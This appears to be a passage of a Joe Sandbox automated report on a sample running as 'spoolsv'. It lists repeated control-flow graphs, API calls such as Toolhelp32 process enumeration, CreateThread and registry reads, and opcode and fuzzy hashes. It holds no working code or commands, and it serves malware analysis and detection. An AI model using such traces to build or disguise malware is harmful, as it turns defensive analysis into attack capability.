                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0000
                                                • API String ID: 0-211534962
                                                • Opcode ID: 0adc0da8b6ac4ccf3f743cce2cbfe1a6654ea4958e7f599bc5796df7d377838d
                                                • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                • Opcode Fuzzy Hash: 0adc0da8b6ac4ccf3f743cce2cbfe1a6654ea4958e7f599bc5796df7d377838d
                                                • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 695 427860-42786f 696 427871-427878 695->696 697 4278ae-4278b6 695->697 698 4278a4-4278a9 call 4256b4 696->698 699 42787a-42789d call 426d0c LoadStringA call 42559c 696->699 698->697 704 4278a2 699->704 704->697
                                                APIs
                                                • LoadStringA.USER32(00000000,0000FF84,?,00001000), ref: 00427892
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LoadString
                                                • String ID:
                                                • API String ID: 2948472770-0
                                                • Opcode ID: 8796358e6523dfde688f4884a08ea08aa8a30318939fa9443135e4f43c793457
                                                • Instruction ID: 22544c539b725ec5b4ac43c57f7f09c783e7cdc452e560019d01f461da980ed3
                                                • Opcode Fuzzy Hash: 8796358e6523dfde688f4884a08ea08aa8a30318939fa9443135e4f43c793457
                                                • Instruction Fuzzy Hash: B0F0A0727005209FCB10EA5DE8C2B8633DC4F4C348B548066B548CB359DB78CC44C7AA

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 695 427860-42786f 696 427871-427878 695->696 697 4278ae-4278b6 695->697 698 4278a4-4278a9 call 4256b4 696->698 699 42787a-42789d call 426d0c LoadStringA call 42559c 696->699 698->697 704 4278a2 699->704 704->697
                                                APIs
                                                • LoadStringA.USER32(00000000,0000FFF4,?,00001000), ref: 00427892
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LoadString
                                                • String ID:
                                                • API String ID: 2948472770-0
                                                • Opcode ID: 73449cd31783198abe0234b761cb9d43333b180b61f606bf4a20dae5c641b838
                                                • Instruction ID: 22544c539b725ec5b4ac43c57f7f09c783e7cdc452e560019d01f461da980ed3
                                                • Opcode Fuzzy Hash: 73449cd31783198abe0234b761cb9d43333b180b61f606bf4a20dae5c641b838
                                                • Instruction Fuzzy Hash: B0F0A0727005209FCB10EA5DE8C2B8633DC4F4C348B548066B548CB359DB78CC44C7AA

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 705 42545e-42549f call 423a80 CreateThread
                                                APIs
                                                • CreateThread.KERNEL32(?,?,Function_00004428,00000000,?,?), ref: 00425496
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                • Instruction ID: cc400aaec5f98775912378b72cba36d114b7af17ff567da94c7c96793c6a670b
                                                • Opcode Fuzzy Hash: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                • Instruction Fuzzy Hash: 5BE0C9B2301224BFD300DA5EAC44E9BBBECDFD9365B50C16AB90CC7221D5759C0186B4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 705 42545e-42549f call 423a80 CreateThread
                                                APIs
                                                • CreateThread.KERNEL32(?,?,Function_00025428,00000000,?,?), ref: 00425496
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                • Instruction ID: cc400aaec5f98775912378b72cba36d114b7af17ff567da94c7c96793c6a670b
                                                • Opcode Fuzzy Hash: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                • Instruction Fuzzy Hash: 5BE0C9B2301224BFD300DA5EAC44E9BBBECDFD9365B50C16AB90CC7221D5759C0186B4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 708 426cc4-426cd2 709 426cd4-426ceb GetModuleFileNameA call 426f58 708->709 710 426cff-426d0a 708->710 712 426cf0-426cf7 709->712 712->710 713 426cf9-426cfc 712->713 713->710
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00426CE2
                                                  • Part of subcall function 00426F58: GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                  • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                  • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                  • Part of subcall function 00426F58: RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                • String ID:
                                                • API String ID: 2796650324-0
                                                • Opcode ID: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                • Instruction ID: 33c73a500caeb01f155e44840a867e4305e698149c574fd086c8c5f59709d573
                                                • Opcode Fuzzy Hash: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                • Instruction Fuzzy Hash: D0E06D71A002249BCB10EE5C99C1A4733D8AF08754F4105A6BCA8CF34AD3B5DD1087E4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 708 426cc4-426cd2 709 426cd4-426ceb GetModuleFileNameA call 426f58 708->709 710 426cff-426d0a 708->710 712 426cf0-426cf7 709->712 712->710 713 426cf9-426cfc 712->713 713->710
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00426CE2
                                                  • Part of subcall function 00426F58: GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                  • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                  • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                  • Part of subcall function 00426F58: RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                • String ID:
                                                • API String ID: 2796650324-0
                                                • Opcode ID: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                • Instruction ID: 33c73a500caeb01f155e44840a867e4305e698149c574fd086c8c5f59709d573
                                                • Opcode Fuzzy Hash: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                • Instruction Fuzzy Hash: D0E06D71A002249BCB10EE5C99C1A4733D8AF08754F4105A6BCA8CF34AD3B5DD1087E4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 714 4cf5c8-4cf5d5 call 4cf34c 717 4cf5d7-4cf5e1 CreateToolhelp32Snapshot 714->717 718 4cf5e2-4cf5e6 714->718
                                                APIs
                                                  • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 2242398760-0
                                                • Opcode ID: aa5b044c588ddfdc3210c4c3c0d3926e160f7f3b193a84c3919e26267408e9fe
                                                • Instruction ID: 2367da90766c253f4fab510a59415ecdd71ebaea341184a550cb27389e70fce3
                                                • Opcode Fuzzy Hash: aa5b044c588ddfdc3210c4c3c0d3926e160f7f3b193a84c3919e26267408e9fe
                                                • Instruction Fuzzy Hash: 14C080A3601520374A1066F53CC4DC34B4DCD451F63144477B505D3213D62D4C1461A4
                                                APIs
                                                  • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                • Process32NextW.KERNEL32(00000000,?), ref: 004CF659
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleModuleNextProcess32
                                                • String ID:
                                                • API String ID: 2237597116-0
                                                • Opcode ID: 8c9a0a4278b6fcd838e880fa5d4eae8115870c90ca26a6c5a323d4618d1d0444
                                                • Instruction ID: f7a2506f4e2c2bd292fd072077a1b2b4fe2edb9bc32b43aa5964b395e8fa5f96
                                                • Opcode Fuzzy Hash: 8c9a0a4278b6fcd838e880fa5d4eae8115870c90ca26a6c5a323d4618d1d0444
                                                • Instruction Fuzzy Hash: F9C080B3301620178F1076F53C84DD34B4DCD491F73040477B505D3212D66D8C046194
                                                APIs
                                                  • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004CF639
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$FirstHandleModuleProcess32
                                                • String ID:
                                                • API String ID: 2774106396-0
                                                • Opcode ID: 1b2f9cd772ea828f0587b818af3bf864f9015723f77f16aa6c12ecd14a310dd8
                                                • Instruction ID: cea9194b1bec40b452e46435030e9f6d0a77cd9c208c2d682c677ae1133cc5ba
                                                • Opcode Fuzzy Hash: 1b2f9cd772ea828f0587b818af3bf864f9015723f77f16aa6c12ecd14a310dd8
                                                • Instruction Fuzzy Hash: 81C080A3301530174A1076F53C85DD34F4DCD451F63144477B504D3213D66D8C156294
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeString
                                                • String ID:
                                                • API String ID: 3341692771-0
                                                • Opcode ID: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                • Instruction ID: 2e196b39daa8764921be558a5a387240bacd155c0bdd8e0ce52a32d021dcfd8b
                                                • Opcode Fuzzy Hash: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                • Instruction Fuzzy Hash: 60B092B42022106EE6119B21AC40B27362AABC1711FB9898AA8008A128CB7CAC019628
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: yymmdd
                                                • API String ID: 0-2871001947
                                                • Opcode ID: c2f0850ca05741d5544196295116c66d8b32a17802d8640e374434aa3ec15c18
                                                • Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
                                                • Opcode Fuzzy Hash: c2f0850ca05741d5544196295116c66d8b32a17802d8640e374434aa3ec15c18
                                                • Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54
                                                APIs
                                                • VirtualFree.KERNEL32(?,?,00004000), ref: 00422924
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                • Instruction ID: 90b6aa8fc387ceb18a887af8a54e4aae20ad55db79348811f77ef19120a841c5
                                                • Opcode Fuzzy Hash: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                • Instruction Fuzzy Hash: E02100B4204212DFC750CF28D980A5ABBE4FF99310F60496AE994CB310D371E948CF56
                                                APIs
                                                • VirtualFree.KERNEL32(?,?,00004000), ref: 00422924
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                • Instruction ID: 90b6aa8fc387ceb18a887af8a54e4aae20ad55db79348811f77ef19120a841c5
                                                • Opcode Fuzzy Hash: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                • Instruction Fuzzy Hash: E02100B4204212DFC750CF28D980A5ABBE4FF99310F60496AE994CB310D371E948CF56
                                                APIs
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004229C3), ref: 00422686
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                • Instruction ID: dad5cfe4248d8bab246a3d25b008404abdce35bce64d087442e73adda1e8f828
                                                • Opcode Fuzzy Hash: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                • Instruction Fuzzy Hash: DBF02E73B006303BDB20596A5E81B535AC59F95790F950077F948EF3CDD5E98C054399
                                                APIs
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004229C3), ref: 00422686
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                • Instruction ID: dad5cfe4248d8bab246a3d25b008404abdce35bce64d087442e73adda1e8f828
                                                • Opcode Fuzzy Hash: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
